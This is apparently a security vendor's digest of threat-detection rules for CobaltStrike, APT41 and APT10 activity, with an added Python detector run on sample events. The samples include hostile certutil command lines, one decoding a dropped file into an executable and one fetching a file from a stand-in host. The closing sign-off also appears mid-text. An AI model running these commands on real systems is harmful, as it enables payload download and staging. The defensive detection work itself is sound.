Rule Digest: CobaltStrike, APT10, and APT41

We are pleased to present the regular Rule Digest, which this time consists only of rules developed by the SOC Prime Team. It is a thematic selection: all of these rules help find malicious activity by APT groups linked to the Chinese government, and by the CobaltStrike tool these groups often use in cyber espionage campaigns.

But before moving directly to the Rule Digest, we want to draw your attention to a critical vulnerability in Windows DNS Servers, CVE-2020-1350 (aka SIGRed) and threat hunting content to detect its exploitation. You can read our special rule digest dedicated to such content here: https://socprime.com/blog/threat-hunting-rules-to-detect-exploitation-of-cve-2020-1350-sigred/

The Possible CobaltStrike PsExec filenames (via audit) rule lets security solutions quickly identify CobaltStrike psexec behavior based on its predictable pseudo-random service naming scheme: by default, CobaltStrike drops a service executable named with 7 random alphanumeric characters (e.g. 28a3fe2.exe). CobaltStrike is often used by the APT41 group, but many other threat actors use this tool as well, so the community rule will be useful in almost every organization: https://tdm.socprime.com/tdm/info/1aX2L06wVHuN/W6usTnMBQAH5UgbBwjB2/?p=1

Wait for the next digest in a week.

Stay safe!

The following two rules detect APT41 group activity. This group utilizes multiple malware families to maintain access to a compromised environment, and in observed campaigns they used the ACEHASH tool in cases where Mimikatz failed. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor. The Possible APT41 ACEHASH usage (via cmdline) rule matches instances of the group's previously observed ACEHASH usage as an encrypted module: https://tdm.socprime.com/tdm/info/TZrew9P8Lrpe/XNKzTXMBPeJ4_8xc3wK_/?p=1

APT41 frequently uses the publicly available utility WMIEXEC to move laterally across an environment. WMIEXEC is a tool that allows the execution of WMI commands on remote machines. The Possible APT41 WMIEXEC Usage (via cmdline) rule detects the customized version of WMIEXEC from impacket used by this actor: https://tdm.socprime.com/tdm/info/V9r85CwVjAA8/f6eyTXMBSh4W_EKGPmgA/?p=1

The last two rules help detect the activity of another Chinese group, APT10 (aka menuPass), in an organization’s network. APT10 is a Chinese cyber espionage group that has been active since 2009. They have historically targeted construction and engineering, aerospace, and telecom firms, as well as governments in the United States, Europe, and Japan.

In past campaigns, the attackers dropped TXT files using a malicious macro; the same macro then decoded the dropped files with Windows certutil.exe and created copies of the files with their proper extensions using the Extensible Storage Engine Utilities (esentutl.exe). The Possible menuPass TTP .TXT in base of unusual directories (via cmdline) rule can uncover such activity so the attack can be stopped: https://tdm.socprime.com/tdm/info/8hpD13wdmRiS/zqqwTXMBQAH5UgbBJ5TR/?p=1
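As an added illustration, not part of this digest or of SOC Prime's rules, the two command-line checks described above (the 7-character CobaltStrike psexec service name, and certutil decoding a dropped .txt file) sketched in Python and run over constructed sample events; the event shape, field names and sample values are assumptions for the demo.

```python
import re

# Default CobaltStrike psexec artifact described in the digest: a service binary
# named with 7 random alphanumeric characters, e.g. 28a3fe2.exe.
_CS_SERVICE_BIN = re.compile(r'(?i)(?:^|[\\/])[a-z0-9]{7}\.exe$')

# menuPass TTP from the digest: a macro-dropped .txt decoded with certutil.
# The esentutl copy step is a follow-on; the certutil decode is the core check.
_CERTUTIL_DECODE = re.compile(r'(?i)\bcertutil(?:\.exe)?\b.*\s-decode\s.*\S+\.txt\b')


def cobaltstrike_psexec_name(image_path: str) -> bool:
    """True if a service image path ends in a 7-char alphanumeric .exe name."""
    return bool(_CS_SERVICE_BIN.search(image_path.strip().strip('"')))


def certutil_txt_decode(cmdline: str) -> bool:
    """True if a process command line decodes a .txt file with certutil."""
    return bool(_CERTUTIL_DECODE.search(cmdline))


def scan(events):
    """Return [(event_index, tag)] for events matching either check.

    Event shape is an assumption: {'type': 'service_install' | 'process',
    'value': image path or command line}.
    """
    hits = []
    for i, ev in enumerate(events):
        if ev['type'] == 'service_install' and cobaltstrike_psexec_name(ev['value']):
            hits.append((i, 'cobaltstrike_psexec_service'))
        elif ev['type'] == 'process' and certutil_txt_decode(ev['value']):
            hits.append((i, 'menupass_certutil_txt_decode'))
    return hits


# Constructed sample events for a stand-alone run (not real telemetry).
SAMPLE_EVENTS = [
    {'type': 'service_install', 'value': r'\\SRV01\ADMIN$\28a3fe2.exe'},
    {'type': 'service_install', 'value': r'C:\Program Files\Vendor\agent.exe'},
    {'type': 'process', 'value': r'certutil.exe -decode C:\ProgramData\update.txt C:\ProgramData\update.exe'},
    {'type': 'process', 'value': r'certutil.exe -urlcache -f http://example.invalid/x x'},
]

if __name__ == '__main__':
    for idx, tag in scan(SAMPLE_EVENTS):
        print(idx, tag, SAMPLE_EVENTS[idx]['value'])
```

The length-only name check also matches legitimate 7-letter binaries (svchost.exe, for one), so in production it should stay scoped to service-install events and be paired with an allowlist of known service binaries.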

The last rule for today helps detect this threat actor's use of “proxyconnect” as a tool to proxy RDP. The Possible menuPass Hacktool proxyconnect (via cmdline) rule is available here: https://tdm.socprime.com/tdm/info/lIbFaxM8Lwsc/paqxTXMBQAH5UgbBL5Vi/?p=1

The rules have translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio

EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint

MITRE ATT&CK:

Tactics: Execution, Credential Access, Collection

Techniques: Service Execution (T1569), Credential Dumping (T1003), PowerShell (T1086), Data Staged (T1074)